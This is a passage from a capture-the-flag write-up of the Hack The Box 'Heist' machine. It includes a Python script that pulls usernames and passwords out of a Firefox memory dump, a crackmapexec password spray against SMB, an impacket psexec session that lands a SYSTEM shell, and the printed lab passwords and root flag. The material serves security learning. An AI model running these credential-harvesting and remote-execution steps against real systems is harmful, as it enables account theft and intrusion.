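What the manual strings-and-grep step does, written out as an added Python example (not code from this writeup) so the mechanics are visible: it extracts printable runs from a dump in both ASCII and UTF-16LE, then parses anything shaped like a URL query string or a form body for username and password fields. The field-name heuristics and SAMPLE_DUMP are constructed for the example; the dump is not the real Firefox dump from the box, it only embeds the values the box gave up so the output is recognisable.

```python
"""Pull credentials out of a process memory dump.

Added example, not code from the writeup. It reproduces the manual
`strings <dump> | grep -i password` step, but also scans UTF-16LE runs
(how Windows keeps most strings in memory, including a process's command
line) and URL-decodes query-string or form-body hits so the password reads
as typed. SAMPLE_DUMP is constructed for this example; it is not the real
Firefox dump from the box.
"""
import re
from urllib.parse import parse_qs

MIN_LEN = 6  # shortest run worth reporting (GNU strings defaults to 4)

# Printable ASCII runs, and the same thing as UTF-16LE (each char followed by NUL).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# Form field names that usually carry a username or a password (heuristic).
USER_KEYS = re.compile(r"user(name)?|email|account", re.I)
PASS_KEYS = re.compile(r"pass(word|wd)?|pwd|secret|token", re.I)


def extract_strings(blob: bytes):
    """Yield (offset, encoding, text) for every printable run in the blob."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def credentials_from_string(text: str) -> list:
    """Parse a URL-with-query or a bare form body into user/password records.

    A login form submitted with GET puts the password into the URL, so it
    shows up in the address bar, history and the browser's command line; a
    POST body sits in memory as application/x-www-form-urlencoded text.
    """
    if "?" in text:
        context, query = text.split("?", 1)
    elif "=" in text:
        context, query = "form-body", text
    else:
        return []
    fields = parse_qs(query, keep_blank_values=True)
    users = [v for k, vs in fields.items() if USER_KEYS.search(k) for v in vs]
    passwords = [v for k, vs in fields.items() if PASS_KEYS.search(k) for v in vs if v]
    return [{"context": context, "user": users[0] if users else None, "password": p}
            for p in passwords]


def scan_dump(blob: bytes) -> list:
    """Scan a dump and return unique user/password hits with offset and encoding."""
    hits, seen = [], set()
    for offset, enc, text in extract_strings(blob):
        for cred in credentials_from_string(text):
            key = (cred["user"], cred["password"])
            if key in seen:
                continue
            seen.add(key)
            hits.append({"offset": offset, "encoding": enc, **cred})
    return hits


# Constructed stand-in for a Firefox dump: a fake minidump header and junk
# padding around a UTF-16LE command line and an ASCII form body.
SAMPLE_DUMP = (
    b"MDMP\x93\xa7\x00\x00" + b"\xff" * 16
    + ("C:\\Program Files\\Mozilla Firefox\\firefox.exe "
       "localhost/login.php?login_username=admin@support.htb"
       "&login_password=4dD!5}x/re8]FBuZ&login=").encode("utf-16le")
    + b"\x00" * 4 + b"\x7f\x00\x10" * 8
    + b"login_username=guest&login_password=guest%21&login=Login"
    + b"\x00" * 8
)

if __name__ == "__main__":
    for h in scan_dump(SAMPLE_DUMP):
        print(f"{h['offset']:#010x} {h['encoding']:9} {h['user']}:{h['password']}  ({h['context']})")
```

Point scan_dump at the real bytes (open(path, "rb").read(); the dumps here are several hundred MB each, so expect a few seconds per file) and it prints each unique user:password with its offset and encoding. The UTF-16LE pass is the one that matters on Windows: a process's command line, including a URL handed to firefox.exe, is stored that way, and a plain strings run or a bytes search for the ASCII word "password" walks straight past it.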

[screenshot: heist admin login]

We can log in to the web portal as admin@support.htb, but there is nothing more to gain there; the value of this password is reuse against the Windows accounts.

Let's fire up crackmapexec again to validate the new password against SMB, this time with administrator in the user list.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ crackmapexec smb 10.10.10.149 -u user.txt -p password.txt
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

and we have a valid combo – administrator:4dD!5}x/re8]FBuZ

Root Flag

Let's use impacket's psexec.py to get in. The (Pwn3d!) marker from crackmapexec means the account has local admin rights, which psexec needs: as the output shows, it uploads a service binary to the ADMIN$ share and creates and starts a service, so it lands us as SYSTEM but is loud on any monitored host.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@heist.htb
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file iajwQmKr.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service PMMu on heist.htb.....
[*] Starting service PMMu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:/users/administrator/desktop


c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of c:\Users\Administrator\Desktop

02/18/2021  04:00 PM    <DIR>          .
02/18/2021  04:00 PM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6,840,758,272 bytes free

c:\Users\Administrator\Desktop>type root.txt
50dfa3c6bfd20e2e0d071b073d766897
c:\Users\Administrator\Desktop>

We finally have both user and root flags; I hope this box was a good learning experience.
